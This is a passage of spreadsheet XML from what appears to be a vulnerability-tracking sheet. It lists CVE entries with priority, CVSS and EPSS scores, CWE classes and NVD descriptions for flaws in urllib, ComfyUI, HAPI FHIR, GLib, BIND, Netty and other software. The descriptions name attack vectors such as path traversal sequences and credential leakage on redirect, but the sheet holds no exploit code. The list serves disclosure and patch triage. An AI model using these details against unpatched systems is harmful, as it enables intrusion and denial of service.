          <t>urllib is an HTTP client for Node.js that supports authentication, redirects, timeouts, and other request features. Prior to 4.9.1 and 2.44.1, urllib follows redirects through followRedirect but reuses caller-supplied options across origins. In src/HttpClient.ts, #requestInternal recursively calls this.#requestInternal(nextUrl.href, options, requestContext), causing options.headers and auth or digestAuth values to be reused when the redirect target has a different scheme, host, or port. Authorization, Cookie, Proxy-Authorization, x-api-key, x-auth-token, and x-access-token can therefore be sent to an attacker-controlled redirected origin, exposing credentials intended for the original origin and potentially allowing reuse against the original partner API or related services. No user interaction is required. This issue is fixed in versions 2.44.1 and 4.9.1.</t>
        </is>
      </c>
      <c r="M2668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55553</t>
        </is>
      </c>
    </row>
    <row r="2669">
      <c r="A2669" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55584</t>
        </is>
      </c>
      <c r="C2669" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2669" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2669" s="5" t="inlineStr"/>
      <c r="F2669" s="5" t="n">
        <v>0.024</v>
      </c>
      <c r="G2669" s="5" t="inlineStr"/>
      <c r="H2669" s="5" t="inlineStr"/>
      <c r="I2669" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2669" s="5" t="inlineStr"/>
      <c r="K2669" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L2669" s="5" t="inlineStr">
        <is>
          <t>phpSysInfo is a customizable PHP script that displays system information. Prior to 3.4.6, the PSI_ALLOWED access-control check in read_config.php trusts attacker-controlled X-Forwarded-For and Client-IP HTTP headers before REMOTE_ADDR. A remote unauthenticated attacker can supply an allowed address in one of these headers to impersonate a trusted client and access exposed hostname, kernel, CPU, memory, filesystem, and network-interface information. This issue is fixed in version 3.4.6.</t>
        </is>
      </c>
      <c r="M2669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55584</t>
        </is>
      </c>
    </row>
    <row r="2670">
      <c r="A2670" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55620</t>
        </is>
      </c>
      <c r="C2670" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2670" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2670" s="5" t="inlineStr"/>
      <c r="F2670" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2670" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2670" s="5" t="inlineStr"/>
      <c r="I2670" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2670" s="5" t="inlineStr"/>
      <c r="K2670" s="5" t="inlineStr">
        <is>
          <t>CWE-1124, CWE-770</t>
        </is>
      </c>
      <c r="L2670" s="5" t="inlineStr">
        <is>
          <t>eml_parser serves as a python module for parsing eml files and returning various information found in the e-mail as well as computed information. Prior to 3.0.2, eml_parser.routing.noparenthesis in eml_parser/routing.py removes parenthesized CFWS comments from Received: headers with a regex-based fix-point loop whose running time is quadratic in the nesting depth. A single Received: header with 5,000 nested parentheses causes approximately 1.3 seconds of CPU saturation per parsed message, and doubling the nesting depth approximately quadruples the running time. An attacker can submit relatively small EML files that consume multiple seconds of processing time, causing worker latency, queue backpressure, and possible service-level outages in synchronous gateways, sandboxes, and real-time triage pipelines. This issue is fixed in version 3.0.2.</t>
        </is>
      </c>
      <c r="M2670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55620</t>
        </is>
      </c>
    </row>
    <row r="2671">
      <c r="A2671" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55784</t>
        </is>
      </c>
      <c r="C2671" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2671" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2671" s="5" t="inlineStr"/>
      <c r="F2671" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2671" s="5" t="inlineStr"/>
      <c r="H2671" s="5" t="inlineStr"/>
      <c r="I2671" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2671" s="5" t="inlineStr"/>
      <c r="K2671" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2671" s="5" t="inlineStr">
        <is>
          <t>free5GC is an open-source implementation of the 5G core network. In version 1.4.4 and earlier, the AUSF component stores per-subscriber authentication state in a global sync.Map named AUSFContext.UePool in internal/context/context.go, keyed only by SUPI. Every request handled by internal/sbi/processor/ue_authentication.go creates an AusfUeContext, and AddAusfUeContextToPool executes ausfContext.UePool.Store(ausfUeContext.Supi, ausfUeContext), unconditionally replacing the active context for that SUPI. An attacker with access to the AUSF SBI/N12 interface can send concurrent POST /nausf-auth/v1/ue-authentications requests for the same target SUPI, causing all attempts to share one logical authentication context URL while K_aut, XRES, and EapID are repeatedly overwritten. A valid EAP-AKA' response for an earlier challenge is then checked against the latest context, causing AT_MAC verification to fail and denying authentication to the selected subscriber while the request flood continues. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="M2671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55784</t>
        </is>
      </c>
    </row>
    <row r="2672">
      <c r="A2672" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55841</t>
        </is>
      </c>
      <c r="C2672" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2672" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2672" s="5" t="inlineStr"/>
      <c r="F2672" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2672" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2672" s="5" t="inlineStr"/>
      <c r="I2672" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2672" s="5" t="inlineStr"/>
      <c r="K2672" s="5" t="inlineStr">
        <is>
          <t>CWE-138</t>
        </is>
      </c>
      <c r="L2672" s="5" t="inlineStr">
        <is>
          <t>Graylog is a free and open log management platform. Prior to Graylog Server versions 6.3.12, 7.0.7, and 7.1.2 and Graylog Forwarder version 7.3, the FortiGate key-value syslog parser in graylog2-server/src/main/java/org/graylog2/inputs/codecs/GLFortiGateSyslogEvent.java and graylog2-server/src/main/java/org/graylog2/inputs/codecs/SyslogCodec.java mishandles field-like text inside quoted values. GLFortiGateSyslogEvent.getFields() uses KV_PATTERN and QUOTED_KV_PATTERN, while SyslogCodec.parse() invokes the FortiGateSyslogEvent parser; crafted values containing = or backslash-escaped quotes can cause embedded keys such as srcip, dstip, date, time, and tz to remove or overwrite original top-level fields or produce an invalid message that Graylog discards. An unauthenticated network sender who can submit syslog messages can therefore manipulate security-log fields or evade logging to obscure malicious activity. This issue is fixed in Graylog Server versions 6.3.12, 7.0.7, and 7.1.2 and Graylog Forwarder version 7.3.</t>
        </is>
      </c>
      <c r="M2672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55841</t>
        </is>
      </c>
    </row>
    <row r="2673">
      <c r="A2673" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56671</t>
        </is>
      </c>
      <c r="C2673" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2673" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2673" s="5" t="inlineStr"/>
      <c r="F2673" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2673" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H2673" s="5" t="inlineStr"/>
      <c r="I2673" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2673" s="5" t="inlineStr"/>
      <c r="K2673" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2673" s="5" t="inlineStr">
        <is>
          <t>ComfyUI is a modular diffusion model GUI, api and backend with a graph/nodes interface. Prior to 0.28.0, get_model_preview in app/model_manager.py joins an unrestricted filename route capture to a selected model directory without a containment check, allowing an unauthenticated remote attacker to use traversal, encoded traversal, absolute paths, or an unbounded path_index to read image-decodable files and enumerate host paths. get_model_preview (app/model_manager.py) built the path with os.path.join(folder, filename) where filename is an unrestricted {filename:.*} route capture. Literal ../, percent-encoded %2e%2e%2f, and absolute paths all escaped the model directory; path_index was also unbounded. The target file is piped through Pillow and re-encoded as WEBP, so disclosure is limited to image-decodable files plus a file-existence/enumeration oracle (and internal-path leakage via path_index errors). This issue is fixed in version 0.28.0.</t>
        </is>
      </c>
      <c r="M2673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56671</t>
        </is>
      </c>
    </row>
    <row r="2674">
      <c r="A2674" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56673</t>
        </is>
      </c>
      <c r="C2674" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2674" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2674" s="5" t="inlineStr"/>
      <c r="F2674" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2674" s="5" t="inlineStr"/>
      <c r="H2674" s="5" t="inlineStr"/>
      <c r="I2674" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2674" s="5" t="inlineStr"/>
      <c r="K2674" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2674" s="5" t="inlineStr">
        <is>
          <t>ComfyUI is a modular diffusion model GUI, API, and backend with a graph-and-node interface. Prior to 0.28.0, folder_paths.get_annotated_filepath and exists_annotated_filepath join workflow-controlled annotated filenames to a base directory without a containment check, allowing an unauthenticated crafted POST /prompt workflow using LoadImage or sibling nodes to probe arbitrary host paths and exfiltrate image-format files through /view. LoadImage defines a VALIDATE_INPUTS method, which causes the execution engine to skip COMBO (input-directory) validation. Affected nodes include LoadImage, LoadImageMask, LoadImageOutput, LoadAudio, LoadLatent, LoadVideo, and Load3D. This issue is fixed in version 0.28.0.</t>
        </is>
      </c>
      <c r="M2674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56673</t>
        </is>
      </c>
    </row>
    <row r="2675">
      <c r="A2675" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5680</t>
        </is>
      </c>
      <c r="C2675" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2675" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2675" s="5" t="inlineStr"/>
      <c r="F2675" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2675" s="5" t="inlineStr"/>
      <c r="H2675" s="5" t="inlineStr"/>
      <c r="I2675" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2675" s="5" t="inlineStr"/>
      <c r="K2675" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2675" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Undertow. A remote attacker could exploit this vulnerability by sending specially crafted WebSocket messages with permessage-deflate negotiated. This could lead to excessive memory consumption due to the PerMessageDeflateFunction.largerBuffer() method using exponential doubling, resulting in a Denial of Service (DoS) for the affected application.</t>
        </is>
      </c>
      <c r="M2675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5680</t>
        </is>
      </c>
    </row>
    <row r="2676">
      <c r="A2676" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56845</t>
        </is>
      </c>
      <c r="C2676" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2676" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2676" s="5" t="inlineStr"/>
      <c r="F2676" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2676" s="5" t="inlineStr"/>
      <c r="H2676" s="5" t="inlineStr"/>
      <c r="I2676" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2676" s="5" t="inlineStr"/>
      <c r="K2676" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2676" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated path traversal (LFI) vulnerability exists under /custom-sounds/ when CustomSounds storage is configured to FileSystem. By including ../ sequences in the request path, an attacker can read arbitrary files outside the base directory.</t>
        </is>
      </c>
      <c r="M2676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56845</t>
        </is>
      </c>
    </row>
    <row r="2677">
      <c r="A2677" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57098</t>
        </is>
      </c>
      <c r="C2677" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2677" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2677" s="5" t="inlineStr"/>
      <c r="F2677" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2677" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2677" s="5" t="inlineStr"/>
      <c r="I2677" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2677" s="5" t="inlineStr"/>
      <c r="K2677" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L2677" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Windows RDP Client allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57098</t>
        </is>
      </c>
    </row>
    <row r="2678">
      <c r="A2678" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57099</t>
        </is>
      </c>
      <c r="C2678" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2678" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2678" s="5" t="inlineStr"/>
      <c r="F2678" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2678" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H2678" s="5" t="inlineStr"/>
      <c r="I2678" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2678" s="5" t="inlineStr"/>
      <c r="K2678" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2678" s="5" t="inlineStr">
        <is>
          <t>Allocation of resources without limits or throttling in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57099</t>
        </is>
      </c>
    </row>
    <row r="2679">
      <c r="A2679" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58011</t>
        </is>
      </c>
      <c r="C2679" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2679" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2679" s="5" t="inlineStr"/>
      <c r="F2679" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2679" s="5" t="inlineStr"/>
      <c r="H2679" s="5" t="inlineStr">
        <is>
          <t>gnome:glib, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I2679" s="5" t="inlineStr">
        <is>
          <t>2026-06-30</t>
        </is>
      </c>
      <c r="J2679" s="5" t="inlineStr"/>
      <c r="K2679" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2679" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GLib. An out-of-bounds read of only 2 bytes can occur in the g_date_time_get_ymd function in the glib/gdatetime.c file when an invalid GDateTime object produced by the g_date_time_add_full function is processed. This flaw can corrupt the date output and potentially cause logic errors that may lead to a denial of service.</t>
        </is>
      </c>
      <c r="M2679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58011</t>
        </is>
      </c>
    </row>
    <row r="2680">
      <c r="A2680" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58015</t>
        </is>
      </c>
      <c r="C2680" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2680" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2680" s="5" t="inlineStr"/>
      <c r="F2680" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2680" s="5" t="inlineStr"/>
      <c r="H2680" s="5" t="inlineStr">
        <is>
          <t>gnome:glib, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I2680" s="5" t="inlineStr">
        <is>
          <t>2026-06-30</t>
        </is>
      </c>
      <c r="J2680" s="5" t="inlineStr"/>
      <c r="K2680" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2680" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GLib. The D-Bus client-side implementation of the DBUS_COOKIE_SHA1 SASL authentication mechanism does not validate the cookie_context parameter received from the server. A malicious D-Bus server can supply a cookie_context containing path traversal sequences, causing the client to read an arbitrary file and exfiltrate sensitive data by verifying guessed file contents against a generated hash.</t>
        </is>
      </c>
      <c r="M2680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58015</t>
        </is>
      </c>
    </row>
    <row r="2681">
      <c r="A2681" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5946</t>
        </is>
      </c>
      <c r="C2681" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2681" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2681" s="5" t="inlineStr"/>
      <c r="F2681" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G2681" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H2681" s="5" t="inlineStr">
        <is>
          <t>isc:bind</t>
        </is>
      </c>
      <c r="I2681" s="5" t="inlineStr">
        <is>
          <t>2026-05-20</t>
        </is>
      </c>
      <c r="J2681" s="5" t="inlineStr"/>
      <c r="K2681" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-1287, CWE-20, CWE-617, CWE-754, CWE-843</t>
        </is>
      </c>
      <c r="L2681" s="5" t="inlineStr">
        <is>
          <t>Multiple flaws have been identified in `named` related to the handling of DNS messages whose CLASS is not Internet (`IN`) — for example, `CHAOS` or `HESIOD`, or DNS messages that specify meta-classes (`ANY` or `NONE`) in the question section. Specially crafted requests reaching the affected code paths — recursion, dynamic updates (`UPDATE`), zone change notifications (`NOTIFY`), or processing of `IN`-specific record types in non-`IN` data — can cause assertion failures in `named`.
This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1.</t>
        </is>
      </c>
      <c r="M2681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5946</t>
        </is>
      </c>
    </row>
    <row r="2682">
      <c r="A2682" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59902</t>
        </is>
      </c>
      <c r="C2682" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2682" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2682" s="5" t="inlineStr"/>
      <c r="F2682" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2682" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H2682" s="5" t="inlineStr"/>
      <c r="I2682" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2682" s="5" t="inlineStr"/>
      <c r="K2682" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2682" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Final and 4.2.17.Final, io.netty.handler.codec.sctp.SctpMessageCompletionHandler limits incomplete messages and fragment counts but not maxBufferedBytes, allowing unauthenticated peers to exhaust memory with large SCTP fragments. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.</t>
        </is>
      </c>
      <c r="M2682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59902</t>
        </is>
      </c>
    </row>
    <row r="2683">
      <c r="A2683" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61686</t>
        </is>
      </c>
      <c r="C2683" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2683" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2683" s="5" t="inlineStr"/>
      <c r="F2683" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2683" s="5" t="inlineStr"/>
      <c r="H2683" s="5" t="inlineStr"/>
      <c r="I2683" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2683" s="5" t="inlineStr"/>
      <c r="K2683" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L2683" s="5" t="inlineStr">
        <is>
          <t>SolidInvoice is an open-source invoicing platform. Prior to version 3.0.1, the `DataGrid` LiveComponent deserializes a `context` prop value using PHP's `unserialize()` after receiving it from the client. Because the prop is marked `writable: true`, an authenticated attacker can supply an arbitrary PHP serialized payload. Version 3.0.1 fixes the issue.</t>
        </is>
      </c>
      <c r="M2683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61686</t>
        </is>
      </c>
    </row>
    <row r="2684">
      <c r="A2684" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62295</t>
        </is>
      </c>
      <c r="C2684" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2684" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2684" s="5" t="inlineStr"/>
      <c r="F2684" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2684" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2684" s="5" t="inlineStr"/>
      <c r="I2684" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2684" s="5" t="inlineStr"/>
      <c r="K2684" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="L2684" s="5" t="inlineStr">
        <is>
          <t>HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to 6.9.11, the JSON utility parser in org.hl7.fhir.utilities.json.parser.JsonParser enforces no maximum nesting depth for arrays or objects. As a result, a small but deeply nested, syntactically valid FHIR JSON document can trigger unbounded readArray() or readObject() recursion, raising a StackOverflowError before structural validation runs. An attacker who can submit JSON resources for validation can thus crash the request thread, and services that do not isolate StackOverflowError safely may experience worker loss or process instability — a denial-of-service condition. This issue is fixed in version 6.9.11.</t>
        </is>
      </c>
      <c r="M2684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62295</t>
        </is>
      </c>
    </row>
    <row r="2685">
      <c r="A2685" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62296</t>
        </is>
      </c>
      <c r="C2685" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2685" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2685" s="5" t="inlineStr"/>
      <c r="F2685" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2685" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2685" s="5" t="inlineStr"/>
      <c r="I2685" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2685" s="5" t="inlineStr"/>
      <c r="K2685" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="L2685" s="5" t="inlineStr">
        <is>
          <t>HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to 6.9.11, XhtmlParser.java imposes no maximum element nesting depth, so a deeply nested text.div narrative triggers unbounded recursion between parseElementInner() and parseElement(), raising a StackOverflowError. An attacker who can submit FHIR resources containing such narratives can thus crash a parsing or validation worker thread, affecting validator services and any application that parses attacker-supplied FHIR JSON or XML. This issue is fixed in version 6.9.11.</t>
        </is>
      </c>
      <c r="M2685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62296</t>
        </is>
      </c>
    </row>
    <row r="2686">
      <c r="A2686" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62317</t>
        </is>
      </c>
      <c r="C2686" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2686" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2686" s="5" t="inlineStr"/>
      <c r="F2686" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2686" s="5" t="inlineStr"/>
      <c r="H2686" s="5" t="inlineStr"/>
      <c r="I2686" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2686" s="5" t="inlineStr"/>
      <c r="K2686" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L2686" s="5" t="inlineStr">
        <is>
          <t>Logto is the modern, open-source auth infrastructure for SaaS and AI apps. Prior to 1.41.0, Logto's email subaddressing blocklist in packages/core/src/libraries/sign-in-experience/email-blocklist-policy.ts used the attacker-controlled domain from email input to construct subaddressingRegex when blockSubaddressing was enabled. The permissive emailRegEx accepted multiple at signs and regular expression metacharacters, and POST /api/experience/verification/verification-code could therefore cause catastrophic backtracking in subaddressingRegex.test(email). The resulting event-loop stall could make authentication, token issuance, SSO, and the administrative console unavailable. This issue is fixed in version 1.41.0.</t>
        </is>
      </c>
      <c r="M2686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62317</t>
        </is>
      </c>
    </row>
    <row r="2687">
      <c r="A2687" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62759</t>
        </is>
      </c>
      <c r="C2687" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2687" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2687" s="5" t="inlineStr"/>
      <c r="F2687" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2687" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2687" s="5" t="inlineStr"/>
      <c r="I2687" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2687" s="5" t="inlineStr"/>
      <c r="K2687" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L2687" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by spoofing in Windows Netlogon allows an unauthorized attacker to perform spoofing over an adjacent network.</t>
        </is>
      </c>
      <c r="M2687" s="6" t="inlineStr">
